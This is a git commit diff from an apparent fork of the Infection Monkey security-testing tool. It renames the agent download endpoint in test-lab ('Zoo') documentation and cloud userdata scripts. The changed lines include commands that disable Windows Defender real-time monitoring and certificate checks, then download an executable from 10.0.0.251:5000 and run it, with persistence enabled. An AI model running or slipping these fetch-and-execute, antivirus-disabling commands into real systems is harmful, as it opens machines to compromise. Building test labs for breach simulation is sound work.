forked from p15670423/monkey
Zoo: Change agent binary download endpoint
This commit is contained in:
parent
9d608920fb
commit
f7315b25f5
|
@ -68,13 +68,13 @@ Example commands:
|
||||||
```cmd
|
```cmd
|
||||||
[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy
|
[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy
|
||||||
Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue
|
Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue
|
||||||
Invoke-WebRequest -Uri 'https://10.0.0.251:5000/api/agent/download/windows' -OutFile 'C:\windows\temp\monkey-windows-64.exe' -UseBasicParsing
|
Invoke-WebRequest -Uri 'https://10.0.0.251:5000/api/agent-binaries/windows' -OutFile 'C:\windows\temp\monkey-windows-64.exe' -UseBasicParsing
|
||||||
C:\windows\temp\monkey-windows-64.exe m0nk3y -s 10.0.0.251:5000
|
C:\windows\temp\monkey-windows-64.exe m0nk3y -s 10.0.0.251:5000
|
||||||
```
|
```
|
||||||
|
|
||||||
- Bash:
|
- Bash:
|
||||||
```shell script
|
```shell script
|
||||||
wget --no-check-certificate -q https://10.0.0.251:5000/api/agent/download/linux -O ./monkey-linux-64 || curl https://10.0.0.251:5000/api/agent/download/linux -k -o monkey-linux-64
|
wget --no-check-certificate -q https://10.0.0.251:5000/api/agent-binaries/linux -O ./monkey-linux-64 || curl https://10.0.0.251:5000/api/agent-binaries/linux -k -o monkey-linux-64
|
||||||
chmod +x ./monkey-linux-64
|
chmod +x ./monkey-linux-64
|
||||||
./monkey-linux-64 m0nk3y -s 10.0.0.251:5000
|
./monkey-linux-64 m0nk3y -s 10.0.0.251:5000
|
||||||
```
|
```
|
||||||
|
|
|
@ -47,7 +47,7 @@ Content-Transfer-Encoding: 7bit
|
||||||
Content-Disposition: attachment; filename="userdata.txt"
|
Content-Disposition: attachment; filename="userdata.txt"
|
||||||
#!/bin/bash
|
#!/bin/bash
|
||||||
rm ./monkey-linux-64
|
rm ./monkey-linux-64
|
||||||
wget --no-check-certificate -q https://10.0.0.251:5000/api/agent/download/linux -O ./monkey-linux-64 || curl https://10.0.0.251:5000/api/agent/download/linux -k -o monkey-linux-64
|
wget --no-check-certificate -q https://10.0.0.251:5000/api/agent-binaries/linux -O ./monkey-linux-64 || curl https://10.0.0.251:5000/api/agent-binaries/linux -k -o monkey-linux-64
|
||||||
chmod +x ./monkey-linux-64
|
chmod +x ./monkey-linux-64
|
||||||
./monkey-linux-64 m0nk3y -s 10.0.0.251:5000
|
./monkey-linux-64 m0nk3y -s 10.0.0.251:5000
|
||||||
--//
|
--//
|
||||||
|
@ -68,7 +68,7 @@ add-type @"
|
||||||
"@
|
"@
|
||||||
[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy
|
[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy
|
||||||
Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue
|
Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue
|
||||||
Invoke-WebRequest -Uri 'https://10.0.0.251:5000/api/agent/download/windows' -OutFile 'C:\windows\temp\monkey-windows-64.exe' -UseBasicParsing
|
Invoke-WebRequest -Uri 'https://10.0.0.251:5000/api/agent-binaries/windows' -OutFile 'C:\windows\temp\monkey-windows-64.exe' -UseBasicParsing
|
||||||
C:\windows\temp\monkey-windows-64.exe m0nk3y -s 10.0.0.251:5000
|
C:\windows\temp\monkey-windows-64.exe m0nk3y -s 10.0.0.251:5000
|
||||||
</powershell>
|
</powershell>
|
||||||
<persist>true</persist>
|
<persist>true</persist>
|
||||||
|
|
Loading…
Reference in New Issue